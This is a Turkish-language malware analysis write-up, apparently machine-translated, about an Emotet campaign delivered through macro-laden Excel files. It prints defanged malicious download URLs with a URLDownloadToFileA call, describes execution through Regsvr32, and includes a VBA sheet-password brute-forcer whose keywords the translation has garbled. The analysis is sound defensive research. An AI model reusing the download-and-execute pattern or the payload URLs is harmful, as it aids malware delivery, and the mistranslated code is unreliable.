İfade Kampanyası:
Ilan Duhin ve Yossi Poberezsky( @pober58 )
Yönetici Özeti:
Son aylarda, Avrupa'da özellikle "Emotet" adlı kötü amaçlı yazılıma yönelik kapsamlı bir kampanya başlatıldı. Kötü amaçlı yazılım bir Excel dosyası olarak gelir ve bir dizi URL ile iletişim kurmaya çalışır ve sonunda makineye dört DLL dosyası indirir.
Emotet, dosyaların bilgisayarda yerel olarak kaydedileceği ve oradan Regsvr32.exe aracılığıyla çalıştırılacağı bir klasör oluşturmak için CreateDirectoryA API çağrısını kullanır.
Statik Analiz:
OLE Araçları:
Dosya yapısını kontrol etme.
Excel 6 sayfalarının içinde sahip olduğumuz bir ipucu elde etmek.
Malwoverview.py kullanarak dosyanın yeteneklerini kontrol edin ve bazı ipuçları alın.
Üçüncü akışa girin ve iplerini çıkarın.
4 şüpheli URL bulun.
Dosya makro içerir. Ayrıca, tüm kodu içeren tüm hücreleri bulun.
Dinamik Analiz:
İlk olarak, excel'i (ofis 2021'in bir parçası) açmaya çalıştık, olmadan açıldığını fark ettik.
"İçeriği Etkinleştir" açılır. biraz araştırma yaptıktan sonra, mesaj yalnızca ofisin 2007–2013 sürümlerinde görünüyor. Bundan sonra Microsoft, çalışan makroları otomatik olarak etkinleştirme seçeneğini engeller.
Makroları etkinleştirmek için aşağıdaki resimdeki gibi seçeneği değiştirmemiz gerekiyor:
** Office 2007/2013'te "İçeriği Etkinleştir" tıklanarak çalışacaktır.
Bir excel dosyasına kaydedip tekrar girmeniz gerekiyor.
Ve şimdi…
Butona bastığımızda karşımıza dört adet mesaj çıkıyor.
regsvr32.exe'ye tıkladığınızda, kötü amaçlı yazılımı çalıştırmak için onu kullanan bu makroları görebilirsiniz. Bir damlalık gibi davranır çünkü DLL'sini oraya yerleştirmek için bir klasör oluşturur.
Excel'i açarken ve statik incelemeyi takiben kurbandan saklanan 6 sayfa görüyoruz.
Her sayfa bir şifre gerektirir.
Şifreyi çıkarmak için “VBA için şifre kırıcı” kullanıyoruz.
Kaynak:https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/
Alt Şifre Kırıcı()
'Çalışma sayfası şifre korumasını kırar.
Dim i Tamsayı Olarak, j Tamsayı Olarak, k Tamsayı Olarak
Dim l Tamsayı Olarak, m Tamsayı Olarak, n Tamsayı Olarak
Dim i1 Tamsayı Olarak, i2 Tamsayı Olarak, i3 Tamsayı Olarak
Dim i4 Tamsayı Olarak, i5 Tamsayı Olarak, i6 Tamsayı Olarak
Hatada Devam Et Sonraki
i = 65 - 66 için: j = 65 - 66 için: k = 65 - 66 için
l = 65 - 66 için: m = 65 - 66 için: i1 = 65 - 66 için
i2 = 65 - 66 için: i3 = 65 - 66 için: i4 = 65 - 66 için
i5 = 65 - 66 için: i6 = 65 - 66 için: n = 32 - 126 için
ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
ActiveSheet.ProtectContents = Yanlış ise O zaman
MsgBox "Kullanılabilir bir şifre " & Chr(i) & Chr(j) & _
Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Abonelikten Çık
Eğer Sonlandır
Sonraki: Sonraki: Sonraki: Sonraki: Sonraki: Sonraki
Sonraki: Sonraki: Sonraki: Sonraki: Sonraki: Sonraki
Aboneliği Sonlandır
VBA kodumuzu eklemek için ALT+F11'e basmamız, yapıştırmamız ve Çalıştırmamız gerekiyor.
şifre kırıcıyı her sayfanın içine yapıştırın.
Excel bize istenen sayfanın şifresini otomatik olarak gösterir.
Bunu sağ tuşa basarak doğrulayabilir ve sayfanın "Korumalı" olduğunu görebiliriz.
Sayfa 1 verileri:
Sayfa 2 verileri:
Dizeleri yeniden düzenlediğimizde dört URL görürüz:
- URLDownloadToFileA”, “JCCB”, 0, “https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc
-https://geringer-muehle.[de]/wp-admin/G/
-http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/
-http://isc.net.[ua]/themes/3rU/
Sayfa 3 verileri:
Sayfa 4 verileri:
Daha önce gördüğümüz iki URL daha.
Sayfa 5 verileri:
Sayfa 6 verileri:
Dizelerin nasıl özetleneceğine ilişkin yönergeleri içerir.
DLL Analizi:
18 numaralı işlevi dışa aktarın.
DLL'yi çalıştırdıktan sonra, bellek sekmesinde birkaç ilginç dize bulduk.
Ek olarak, yürütülürken kendisini bir sonraki yola bırakır:
VT'de DLL'nin bellek dizesini analiz ederken, Emotet'in bir açıklamasını aldık.
Sonuçlar:
· Makrolar, Emotet kötü amaçlı yazılımını indirmek ve yürütmek için uzanır.
· Web URL'lerine ulaşmak için makro kullanan excel dosyası.
· Regsvr32.exe Emotet aracılığıyla infazını yapıyor.
· Emotet dropper, %UserProfile%\Appdata\Local altındaki rastgele oluşturulmuş bir klasöre bir dll dosyası olarak indirilir.

![Bağlantılı Liste Nedir? [Bölüm 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































